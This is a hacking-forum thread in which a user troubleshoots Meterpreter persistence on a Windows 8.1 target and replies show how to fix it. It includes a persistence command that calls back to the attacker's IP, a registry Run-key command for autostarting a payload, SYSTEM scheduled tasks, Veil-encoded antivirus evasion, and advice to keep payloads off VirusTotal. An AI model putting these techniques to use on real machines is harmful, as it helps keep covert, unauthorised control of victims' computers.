Hello again Null Byte,
I'd like to thank some members again for helping me out with a previous brick wall I was running into, it's working much better now thanks.
Just a few questions I haven't been able to get answered after repeated testing and googling.
1.) The persistence .vbs script is getting blocked on startup with an "Access is Denied" error after getting full privileges, target is using Windows 8.1 x64. Common occurance? The answer might be connected to question nr. 2...
2.) Is it normal to lose privileged access after reboot?
On my target machine I use the exploit/local/windows/ask, then getprivs, then getsystem and it works on the first try. Bam! I'm In! Now I setup the persistence script, reboot. And when it restarts, .vbs access is denied so persistence doesn't run and when I manually run the payload again I have lost all privileges.
3.) This is the persistence command line I use
"run persistence -A -L c:\\Windows -S -U -X -i 15 -p <MyPort> -r <MyIP>"
I place it in Windows to make it less noticeable because it kinda sticks out when I place it in C:\\, so perhaps the placement is the problem.
So the question becomes, how do I place it in another location? When I try C:\\Users, \Program Files or \Program Files (x86) it just gives me errors saying the locationes aren't found.
I hope it's OK asking all these questions, I feel this community rewards self-learning so maybe a path in the right direction would be better than a straight up answer.
Thanks in advance,
Ulf
3 Responses
Where are you getting the "Access Denied"? Is it showing up in the Windows UI or in your meterpreter session?
It makes sense that you'd lose your privileges after having to reload the payload. Your system privs are supposed to persist via the -S switch (run under System) -- if the script isn't executing properly, then it's not giving you your privileges back.
It might be a weird conflict between Windows 8.1 and Meterpreter. I've noticed MSF doesn't always play nice with W8, especially when it comes to escalating.
BUT it might also just be because your command is creating a conflict while the script isn't echoing an error for you. Have you actually verified that the registry keys were created?
You can view the Metasploit source code on github. Here is the script you're trying to run: persist.rb
All it does is generate a payload file in vbs, create a service (optionally), and then add a key to the registry. Note where it assigns a value to the arguments:
when "-h"
usage
when "-r"
rhost = val
when "-p"
rport = val.to_i
when "-i"
delay = val.to_i
when "-X"
install = true
key = "HKLM"
when "-S"
serv = true
when "-U"
install = true
key = "HKCU"
when "-A"
autoconn = true
when "-L"
target_dir = val
when "-T"
altexe = val
when "-P"
payload_type = val
# Installs payload in to the registry HKLM or HKCU
def write_to_reg(key, script_on_target, registry_value)
regsuccess = true
nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
You're using both X and U in your command, so you're telling it to write the key in two places at once. Remove the X or the U from your arguments and try again.
If it still doesn't work, then just manually create a key that points to whatever file you're using to connect to meterpreter:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v PersistMe2 /t REG_SZ /d 'C:\Path\Payload.exe' /f
Thanks for the reply Netstat, the access is denied error is showing up in the target machine on reboot. If I understand it correctly the Registry Key simply makes the script autorun but after restarting I get the same Access is denied error even when I manually click the .vbs script. Wouldn't I get the same error if I tried manually editing the Registry?
Was looking through some commands and I came across 'scheduleme.rb'. I tried it out and it seems to work better since the .vbs script is caught all the time by the AV.
Scheduleme gives me NT AUTHORITY/SYSTEM access from the get-go and since I can upload whatever I want I used the veil encoded .exe which can evade almost all AV, so far. Only downside is that, for some reason, it's very slow and many commands time out, gonna look into that. Also it gives me a different set of privileges than the standard getsystem command. More of them actually.
Problem solved though different means, thanks for the help Netstat.
Ulf
Good!
Yeah, schtasks is way easier. If the script is being slow, just do it manually. Upload the file where you want, run schtasks with the /RU System switch, and you're done!
And remember to never upload a payload to VirusTotal.
Share Your Thoughts